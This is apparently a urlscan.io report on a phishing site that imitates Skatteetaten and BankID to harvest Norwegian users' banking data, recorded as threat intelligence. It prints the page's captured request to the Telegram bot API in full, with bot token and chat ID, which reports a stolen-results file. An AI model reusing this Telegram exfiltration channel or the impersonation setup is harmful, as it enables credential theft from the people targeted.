skatteetaten.is-a-liberal.com
45.149.241.148  Malicious Activity! Public Scan

Submitted URL: https://f1ite.r.ag.d.sendibm3.com/mk/cl/f/sh/OycZvHuFo1eQuvTbYdGTSm7M/PR2CTu5BRsu0
Effective URL: https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477
Submission: On January 14 via manual from NO — Scanned from NO

Summary

This website contacted 7 IPs in 4 countries across 7 domains to perform 12 HTTP transactions. The main IP is 45.149.241.148, located in Ashburn, United States and belongs to NYBULA, US. The main domain is skatteetaten.is-a-liberal.com.
TLS certificate: Issued by R11 on January 13th 2025. Valid for: 3 months.
This is the only time skatteetaten.is-a-liberal.com was scanned on urlscan.io!

urlscan.io Verdict: Potentially Malicious

Targeting these brands: BankID (Banking)

Community Verdicts: Malicious (1 vote)

Domain & IP information

Requests | IP Address | AS (Autonomous System)
1 | 1.179.112.197 | 396982 (GOOGLE-CL...)
1 | 2606:4700:440... | 13335 (CLOUDFLAR...)
7 (2 redirects) | 45.149.241.148 | 401116 (NYBULA)
2 | 104.17.24.14 | 13335 (CLOUDFLAR...)
1 | 104.18.11.207 | 13335 (CLOUDFLAR...)
1 | 2001:67c:4e8:... | 62041 (Telegram ...)
Total: 12 requests, 7 IPs

Requests | Apex Domain | Subdomains | Transfer
7 | is-a-liberal.com | skatteetaten-efaktura.is-a-liberal.com; skatteetaten.is-a-liberal.com | 13 KB
2 | cloudflare.com | cdnjs.cloudflare.com (Cisco Umbrella Rank: 225) | 35 KB
1 | telegram.org | api.telegram.org (Cisco Umbrella Rank: 47163) | 626 B
1 | bootstrapcdn.com | maxcdn.bootstrapcdn.com (Cisco Umbrella Rank: 1255) | 14 KB
1 | sibautomation.com | sibautomation.com (Cisco Umbrella Rank: 23280) |
1 | sendibm3.com | f1ite.r.ag.d.sendibm3.com | 852 B
0 | googleapis.com (Failed) | translate.googleapis.com (Failed) |
Total: 12 requests, 7 domains

Requests | Domain | Requested by
6 (1 redirect) | skatteetaten.is-a-liberal.com | f1ite.r.ag.d.sendibm3.com; skatteetaten.is-a-liberal.com
2 | cdnjs.cloudflare.com | skatteetaten.is-a-liberal.com
1 | api.telegram.org | skatteetaten.is-a-liberal.com
1 | maxcdn.bootstrapcdn.com | skatteetaten.is-a-liberal.com
1 (1 redirect) | skatteetaten-efaktura.is-a-liberal.com |
1 | sibautomation.com | f1ite.r.ag.d.sendibm3.com
1 | f1ite.r.ag.d.sendibm3.com |
0 (Failed) | translate.googleapis.com | skatteetaten.is-a-liberal.com
Total: 12 requests, 8 subdomains

This site contains no links.

Subject | Issuer | Validity | Valid
*.r.ag.d.sendibm3.com | R10 | 2024-11-12 - 2025-02-10 | 3 months
sibautomation.com | WE1 | 2024-12-01 - 2025-03-01 | 3 months
skatteetaten.is-a-liberal.com | R11 | 2025-01-13 - 2025-04-13 | 3 months
cdnjs.cloudflare.com | WE1 | 2024-11-26 - 2025-02-24 | 3 months
bootstrapcdn.com | WE1 | 2024-11-18 - 2025-02-16 | 3 months
api.telegram.org | Go Daddy Secure Certificate Authority - G2 | 2024-03-24 - 2025-04-25 | a year

This page contains 2 frames:

Primary Page: https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477
Frame ID: ADEB17648FE11E73AF03F625F3B02AAA
Requests: 11 HTTP requests in this frame

Frame: https://sibautomation.com/cm.html?id=8565142
Frame ID: 2B08F55FEF57599F3C8A9DA2AEF21DBD
Requests: 1 HTTP requests in this frame

Page Title

Skatteetaten

Detected technologies

Overall confidence: 100%
Detected patterns
  • bootstrap(?:[^>]*?([0-9a-fA-F]{7,40}|[\d]+(?:.[\d]+(?:.[\d]+)?)?)|)[^>]*?(?:\.min)?\.js

Overall confidence: 100%
Detected patterns
  • /([\d.]+)/jquery(?:\.min)?\.js
  • jquery.*\.js(?:\?ver(?:sion)?=([\d.]+))?

Page Statistics

Requests: 12
HTTPS: 92 %
IPv6: 33 %
Domains: 7
Subdomains: 8
IPs: 7
Countries: 4
Transfer: 62 kB
Size: 193 kB
Cookies: 2

Page URL History

This captures the URL locations of the websites, including HTTP redirects and client-side redirects via JavaScript or Meta fields.

  1. https://f1ite.r.ag.d.sendibm3.com/mk/cl/f/sh/OycZvHuFo1eQuvTbYdGTSm7M/PR2CTu5BRsu0 Page URL
  2. https://skatteetaten-efaktura.is-a-liberal.com/www/no/?p=dWNSK HTTP 302
    https://skatteetaten.is-a-liberal.com/no/no/?token= HTTP 302
    https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477 Page URL

Redirected requests

There were HTTP redirect chains for the following requests:

12 HTTP transactions

Resource
Path
Size
x-fer
Type
MIME-Type
PR2CTu5BRsu0
f1ite.r.ag.d.sendibm3.com/mk/cl/f/sh/OycZvHuFo1eQuvTbYdGTSm7M/
705 B
852 B
Document
General
Full URL
https://f1ite.r.ag.d.sendibm3.com/mk/cl/f/sh/OycZvHuFo1eQuvTbYdGTSm7M/PR2CTu5BRsu0
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
1.179.112.197 , France, ASN396982 (GOOGLE-CLOUD-PLATFORM, US),
Reverse DNS
Software
/
Resource Hash
679aa845ca8e635ca1b06b9314eab436de2b6c244a2049c57ad5c08023eff354
Security Headers
Name Value
X-Content-Type-Options nosniff
X-Xss-Protection 1

Request headers

Upgrade-Insecure-Requests
1
User-Agent
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36

Response headers

content-length
705
content-type
text/html; charset=utf-8
date
Tue, 14 Jan 2025 17:54:01 GMT
x-content-type-options
nosniff
x-sib-server
gke-public-cluster-v2-1-179-114-10
x-xss-protection
1
cm.html
sibautomation.com/ Frame 2B08
0
0
Document
General
Full URL
https://sibautomation.com/cm.html?id=8565142
Requested by
Host: f1ite.r.ag.d.sendibm3.com
URL: https://f1ite.r.ag.d.sendibm3.com/mk/cl/f/sh/OycZvHuFo1eQuvTbYdGTSm7M/PR2CTu5BRsu0
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2606:4700:4400::6812:278d , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare / Sails <sailsjs.com>
Resource Hash

Request headers

Referer
https://f1ite.r.ag.d.sendibm3.com/
Upgrade-Insecure-Requests
1
User-Agent
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36

Response headers

access-control-allow-origin
*
age
4010
cache-control
public, max-age=7200
cf-cache-status
HIT
cf-ray
901f7d25893456c1-OSL
content-encoding
gzip
content-type
text/html; charset=utf-8
date
Tue, 14 Jan 2025 17:54:01 GMT
expires
Tue, 14 Jan 2025 19:54:01 GMT
server
cloudflare
vary
Accept-Encoding
x-powered-by
Sails <sailsjs.com>
Primary Request /
skatteetaten.is-a-liberal.com/no/no/no/login/
Redirect Chain
  • https://skatteetaten-efaktura.is-a-liberal.com/www/no/?p=dWNSK
  • https://skatteetaten.is-a-liberal.com/no/no/?token=
  • https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477
3 KB
2 KB
Document
General
Full URL
https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477
Requested by
Host: f1ite.r.ag.d.sendibm3.com
URL: https://f1ite.r.ag.d.sendibm3.com/mk/cl/f/sh/OycZvHuFo1eQuvTbYdGTSm7M/PR2CTu5BRsu0
Protocol
H2
Security
TLS 1.3, , AES_256_GCM
Server
45.149.241.148 Ashburn, United States, ASN401116 (NYBULA, US),
Reverse DNS
Software
nginx /
Resource Hash
c641cfc911ae665bf7ad30730cbe18c52ce382b0c7679bc66bac7f09a3bb421c
Security Headers
Name Value
X-Content-Type-Options nosniff nosniff
X-Frame-Options SAMEORIGIN SAMEORIGIN
X-Xss-Protection 1; mode=block 1; mode=block

Request headers

Referer
https://f1ite.r.ag.d.sendibm3.com/mk/cl/f/sh/OycZvHuFo1eQuvTbYdGTSm7M/PR2CTu5BRsu0
Upgrade-Insecure-Requests
1
User-Agent
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36

Response headers

cache-control
no-store, no-cache, must-revalidate
content-encoding
br
content-type
text/html; charset=UTF-8
date
Tue, 14 Jan 2025 17:54:04 GMT
expires
Thu, 19 Nov 1981 08:52:00 GMT
pragma
no-cache
referrer-policy
same-origin same-origin
server
nginx
vary
Accept-Encoding
x-content-type-options
nosniff nosniff
x-frame-options
SAMEORIGIN SAMEORIGIN
x-permitted-cross-domain-policies
master-only master-only
x-xss-protection
1; mode=block 1; mode=block

Redirect headers

cache-control
no-store, no-cache, must-revalidate
content-type
text/html; charset=UTF-8
date
Tue, 14 Jan 2025 17:54:03 GMT
expires
Thu, 19 Nov 1981 08:52:00 GMT
location
no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477
pragma
no-cache
referrer-policy
same-origin same-origin
server
nginx
x-content-type-options
nosniff nosniff
x-frame-options
SAMEORIGIN SAMEORIGIN
x-permitted-cross-domain-policies
master-only master-only
x-xss-protection
1; mode=block 1; mode=block
authorization.css
skatteetaten.is-a-liberal.com/no/no/no/login/assets/
14 KB
3 KB
Stylesheet
General
Full URL
https://skatteetaten.is-a-liberal.com/no/no/no/login/assets/authorization.css
Requested by
Host: skatteetaten.is-a-liberal.com
URL: https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477
Protocol
H2
Security
TLS 1.3, , AES_256_GCM
Server
45.149.241.148 Ashburn, United States, ASN401116 (NYBULA, US),
Reverse DNS
Software
nginx /
Resource Hash
939400928b7e464e4b467b2059bcbce04cdb83c7dcdf81c1c413b496a25bb7c5

Request headers

User-Agent
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Referer
https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477

Response headers

cache-control
max-age=315360000
content-encoding
br
etag
W/"6782fedc-36e6"
expires
Thu, 31 Dec 2037 23:55:55 GMT
access-control-allow-origin
*
date
Tue, 14 Jan 2025 17:54:04 GMT
content-type
text/css
last-modified
Sat, 11 Jan 2025 23:29:32 GMT
server
nginx
vary
Accept-Encoding
translateelement.css
translate.googleapis.com/translate_static/css/
0
0

bankid-logo.28f35de5.svg
skatteetaten.is-a-liberal.com/no/no/no/login/assets/
3 KB
1 KB
Image
General
Full URL
https://skatteetaten.is-a-liberal.com/no/no/no/login/assets/bankid-logo.28f35de5.svg
Requested by
Host: skatteetaten.is-a-liberal.com
URL: https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477
Protocol
H2
Security
TLS 1.3, , AES_256_GCM
Server
45.149.241.148 Ashburn, United States, ASN401116 (NYBULA, US),
Reverse DNS
Software
nginx /
Resource Hash
484e8282229f40d3e277f96ca4584b7d6c863f4270f5294bc52c365f5e6473fc

Request headers

User-Agent
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Referer
https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477

Response headers

cache-control
max-age=315360000
content-encoding
br
etag
W/"6782fedc-a0b"
expires
Thu, 31 Dec 2037 23:55:55 GMT
access-control-allow-origin
*
date
Tue, 14 Jan 2025 17:54:04 GMT
content-type
image/svg+xml
last-modified
Sat, 11 Jan 2025 23:29:32 GMT
server
nginx
vary
Accept-Encoding
jquery.min.js
cdnjs.cloudflare.com/ajax/libs/jquery/1.6.1/
89 KB
28 KB
Script
General
Full URL
https://cdnjs.cloudflare.com/ajax/libs/jquery/1.6.1/jquery.min.js
Requested by
Host: skatteetaten.is-a-liberal.com
URL: https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477
Protocol
H3
Security
QUIC, , AES_128_GCM
Server
104.17.24.14 -, , ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare /
Resource Hash
c784376960f3163dc760bc019e72e5fed78203745a5510c69992a39d1d8fe776
Security Headers
Name Value
Strict-Transport-Security max-age=15780000
X-Content-Type-Options nosniff

Request headers

User-Agent
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Referer

Response headers

cf-cdnjs-via
cfworker/kv
content-encoding
br
cf-cache-status
HIT
etag
"5eb03ec4-164ce"
age
4159744
report-to
{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TbNlQ3qSBuXKfsjsNEVYM2nlv2dVPFNitzLNwZqqYSavypaYLZsYmMbN81H2WEPB8rIPc0OOF9S9G3RZo08ryNTKeK2K%2FkHn%2F8rP3erDQ3Y8WyLjizmdyCbQ4BmjUziTE%2F9j%2F7RF"}],"group":"cf-nel","max_age":604800}
x-content-type-options
nosniff
expires
Sun, 04 Jan 2026 17:54:04 GMT
alt-svc
h3=":443"; ma=86400
server-timing
cfExtPri
date
Tue, 14 Jan 2025 17:54:04 GMT
content-type
application/javascript; charset=utf-8
last-modified
Mon, 04 May 2020 16:11:48 GMT
vary
Accept-Encoding
priority
u=1,i=?0
strict-transport-security
max-age=15780000
cache-control
public, max-age=30672000
timing-allow-origin
*
nel
{"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
cross-origin-resource-policy
cross-origin
cf-ray
901f7d3ca9725696-OSL
accept-ranges
bytes
access-control-allow-origin
*
content-length
28293
server
cloudflare
jsquery.js
skatteetaten.is-a-liberal.com/no/no/no/login/assets/js/
9 KB
2 KB
Script
General
Full URL
https://skatteetaten.is-a-liberal.com/no/no/no/login/assets/js/jsquery.js
Requested by
Host: skatteetaten.is-a-liberal.com
URL: https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477
Protocol
H2
Security
TLS 1.3, , AES_256_GCM
Server
45.149.241.148 Ashburn, United States, ASN401116 (NYBULA, US),
Reverse DNS
Software
nginx /
Resource Hash
f465d22e361f02fff87ff22d605b0c53f9d9ee941ecb7c99f9e72aea1bfb7562

Request headers

User-Agent
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Referer
https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477

Response headers

cache-control
max-age=315360000
content-encoding
br
etag
W/"67835352-24de"
expires
Thu, 31 Dec 2037 23:55:55 GMT
access-control-allow-origin
*
date
Tue, 14 Jan 2025 17:54:04 GMT
content-type
application/javascript
last-modified
Sun, 12 Jan 2025 05:29:54 GMT
server
nginx
vary
Accept-Encoding
jquery.validate.min.js
cdnjs.cloudflare.com/ajax/libs/jquery-validate/1.16.0/
23 KB
7 KB
Script
General
Full URL
https://cdnjs.cloudflare.com/ajax/libs/jquery-validate/1.16.0/jquery.validate.min.js
Requested by
Host: skatteetaten.is-a-liberal.com
URL: https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477
Protocol
H3
Security
QUIC, , AES_128_GCM
Server
104.17.24.14 -, , ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare /
Resource Hash
50e497b00818378dcffe856b994f89947b620c66163768879c9b8a63d583f898
Security Headers
Name Value
Strict-Transport-Security max-age=15780000
X-Content-Type-Options nosniff

Request headers

User-Agent
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Referer

Response headers

cf-cdnjs-via
cfworker/kv
content-encoding
br
cf-cache-status
HIT
etag
"5eb03ec2-5a1e"
age
66817
report-to
{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zLbR4rUYV3Ap7NIOODQEJMMgci4r98w4Ul35AtY7D%2FoWdBFSY7w1XsGu5nmrk%2Fic0rYztcKBKX8x5Jas5JZxzwsjqIpVhpE6hKt7iY69i2V0wyOuW8TeJN2u%2Bv6NP%2Baa0zfeuFHR"}],"group":"cf-nel","max_age":604800}
x-content-type-options
nosniff
expires
Sun, 04 Jan 2026 17:54:04 GMT
alt-svc
h3=":443"; ma=86400
server-timing
cfExtPri
date
Tue, 14 Jan 2025 17:54:04 GMT
content-type
application/javascript; charset=utf-8
last-modified
Mon, 04 May 2020 16:11:46 GMT
vary
Accept-Encoding
priority
u=2,i=?0
strict-transport-security
max-age=15780000
cache-control
public, max-age=30672000
timing-allow-origin
*
nel
{"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
cross-origin-resource-policy
cross-origin
cf-ray
901f7d3ca96f5696-OSL
accept-ranges
bytes
access-control-allow-origin
*
content-length
6638
server
cloudflare
bootstrap.min.js
maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/
48 KB
14 KB
Script
General
Full URL
https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
Requested by
Host: skatteetaten.is-a-liberal.com
URL: https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477
Protocol
H3
Security
QUIC, , AES_128_GCM
Server
104.18.11.207 -, , ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare /
Resource Hash
e7ed36ceee5450b4243bbc35188afabdfb4280c7c57597001de0ed167299b01b
Security Headers
Name Value
Strict-Transport-Security max-age=31536000; includeSubDomains; preload
X-Content-Type-Options nosniff

Request headers

User-Agent
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Referer

Response headers

cdn-status
200
content-encoding
br
cf-cache-status
HIT
etag
"14d449eb8876fa55e1ef3c2cc52b0c17"
age
2390222
x-content-type-options
nosniff
alt-svc
h3=":443"; ma=86400
server-timing
cfExtPri
date
Tue, 14 Jan 2025 17:54:04 GMT
last-modified
Mon, 25 Jan 2021 22:04:04 GMT
content-type
application/javascript; charset=utf-8
vary
Accept-Encoding
cdn-cache
HIT
cdn-cachedat
11/20/2024 14:11:37
cdn-requestpullcode
200
priority
u=2,i=?0
strict-transport-security
max-age=31536000; includeSubDomains; preload
cache-control
public, max-age=31919000
cdn-requestpullsuccess
True
timing-allow-origin
*
cdn-requesttime
0
cdn-uid
b1941f61-b576-4f40-80de-5677acb38f74
cdn-requestid
22ee951d058bdbb194846a7e3e968d83
cross-origin-resource-policy
cross-origin
cdn-pullzone
252412
cdn-proxyver
1.06
cf-ray
901f7d3cba64b4ee-OSL
access-control-allow-origin
*
cdn-edgestorageid
1002
server
cloudflare
cdn-requestcountrycode
US
sendMessage
api.telegram.org/bot6958975869:AAGprkEhk7vazdIVlRoHcDv259ZdjJSH6ds/
379 B
626 B
Fetch
General
Full URL
https://api.telegram.org/bot6958975869:AAGprkEhk7vazdIVlRoHcDv259ZdjJSH6ds/sendMessage?text=https://skatteetaten.is-a-liberal.com/no/no/no/login/../rezult/skatt-rzlt.txt&chat_id=-1002288607586&parse_mode=html&disable_notification=false
Requested by
Host: skatteetaten.is-a-liberal.com
URL: https://skatteetaten.is-a-liberal.com/no/no/no/login/assets/js/jsquery.js
Protocol
H2
Security
TLS 1.3, , AES_256_GCM
Server
2001:67c:4e8:f004::9 Amsterdam, Netherlands, ASN62041 (Telegram Telegram Messenger Inc, VG),
Reverse DNS
Software
nginx/1.18.0 /
Resource Hash
afdfe9422bded60757d29fc07115192a78db42e5f51c3ff43c071eeb616cd0e9
Security Headers
Name Value
Strict-Transport-Security max-age=31536000; includeSubDomains; preload

Request headers

User-Agent
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Referer

Response headers

strict-transport-security
max-age=31536000; includeSubDomains; preload
access-control-expose-headers
Content-Length,Content-Type,Date,Server,Connection
access-control-allow-methods
GET, POST, OPTIONS
access-control-allow-origin
*
content-length
379
date
Tue, 14 Jan 2025 17:54:05 GMT
content-type
application/json
server
nginx/1.18.0
favicon.b4be5517.png
skatteetaten.is-a-liberal.com/no/no/no/login/assets/
4 KB
4 KB
Other
General
Full URL
https://skatteetaten.is-a-liberal.com/no/no/no/login/assets/favicon.b4be5517.png
Protocol
H2
Security
TLS 1.3, , AES_256_GCM
Server
45.149.241.148 Ashburn, United States, ASN401116 (NYBULA, US),
Reverse DNS
Software
nginx /
Resource Hash
09279bbfd669e9974f4ff8c987417665eb32a3377a6a39182e87eda820554544

Request headers

User-Agent
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Referer
https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477

Response headers

cache-control
max-age=315360000
content-encoding
br
etag
W/"6782fedc-117b"
expires
Thu, 31 Dec 2037 23:55:55 GMT
access-control-allow-origin
*
date
Tue, 14 Jan 2025 17:54:05 GMT
content-type
image/png
last-modified
Sat, 11 Jan 2025 23:29:32 GMT
server
nginx
vary
Accept-Encoding

Failed requests

These URLs were requested, but there was no response received. You will also see them in the list above.

Domain: translate.googleapis.com
URL: https://translate.googleapis.com/translate_static/css/translateelement.css

Verdicts & Comments


Malicious page.domain
Submitted on January 14th 2025, 5:55:40 pm UTC — From Norway

Threats: Phishing Brand Impersonation
Brands: BankID NO Skatteetaten NO
Comment: This is a fraudulent web page used in a phishing campaign using the name of "Norwegian Tax Administration (Skatteetaten)" and "BankID" to mislead citizens to give them personal, bank and credit card information. Only active from Norwegian IP addresses.

Potentially malicious activity detected
Disclaimer: These verdicts should be used to detect potentially malicious websites, not as a final verdict!

urlscan

Phishing against: BankID (Banking)

6 JavaScript Global Variables

These are the non-standard "global" variables defined on the window object. These can be helpful in identifying possible client-side frameworks and code.

  • function: $
  • function: jQuery
  • function: _0xd4e9
  • function: _0x7687a6
  • function: _0x2ee8
  • object: bootstrap

2 Cookies

Domain/Path | Name | Value
sibautomation.com/ | uuid | fead9946-7be0-4f0e-b182-020d2e9c7ed3
skatteetaten.is-a-liberal.com/ | PHPSESSID | iieq8mih679nq0476151rtnrlm

Security Headers

This page lists any security headers set by the main page.

Header Value
X-Content-Type-Options nosniff
X-Xss-Protection 1